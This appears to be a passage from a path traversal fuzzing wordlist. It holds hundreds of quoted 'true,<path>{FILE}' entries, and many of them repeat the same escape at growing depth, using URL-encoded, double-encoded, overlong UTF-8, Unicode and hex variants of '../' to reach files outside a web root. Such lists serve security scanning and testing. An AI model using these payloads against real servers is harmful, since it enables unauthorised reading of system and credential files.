"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
